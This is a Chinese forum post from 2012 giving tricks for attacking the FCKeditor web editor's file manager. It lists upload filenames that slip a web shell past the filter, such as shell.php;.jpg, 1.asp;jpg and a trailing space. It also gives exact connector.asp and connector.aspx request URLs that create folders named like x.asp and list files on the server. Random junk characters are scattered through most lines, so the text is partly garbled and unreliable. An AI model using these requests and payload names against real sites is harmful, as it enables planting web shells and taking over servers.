很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg/ q9 {, G3 [2 Q* g
8 Q2 d0 B0 L7 ]( j- x, r7 y/ b4 V
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。4 K' C8 I9 q/ k; s- k+ P( O
& r. a7 T. h5 o8 Y D6 \继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
3 H9 G+ }( d1 @7 X8 \
- `: w9 n S t突破建立文件夹:
9 G& r" [/ V( } X& `% p0 f. C- J1 I8 {" m [# f I
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
Z+ c4 Y% A& }3 n6 c
5 H+ X0 |, C2 O参数:
' x9 |0 \* E8 v5 O' [* h7 T! q: Y
当前目录名:CurrentFolder=/qing.asp' t* o8 M, K6 E7 a" Q+ T
8 ~* z5 s6 N, N
新的目录名:NewFolderName=x.asp7 E" P* o" y1 X0 O0 j& ]
' ?. B1 b5 M2 H0 D6 X3 g$ [7 M
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……# f% z" D( C0 n
3 [' T- G' |& X5 p
那么 x.asp 就已经建立生成了,此方法百试百灵!
6 ]3 V0 q* g: H- ], x* @) E" m: d1 \! }: A1 i$ v" x
新建文件夹参数 x.asp,基本都能搞定。
# p2 v! x8 J r( ^' X9 h9 f
5 X( a O4 ]( i下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建2 c; n% L% s1 I& ]( }) G
" D# z) J; B' K: e) P
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
( ?, _, Z, A0 x* U1 D
9 K! ~( i$ ^+ ?+ {' o4 m" D t获取文件列表5 Z. Z% z, ? v! [
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
1 X9 n z; k3 o' N3 E3 {) m' Q5 o( Y4 }; o' ] ]& Q8 {% T
|
发表于 2012-12-31 09:27:09
收藏
支持
反对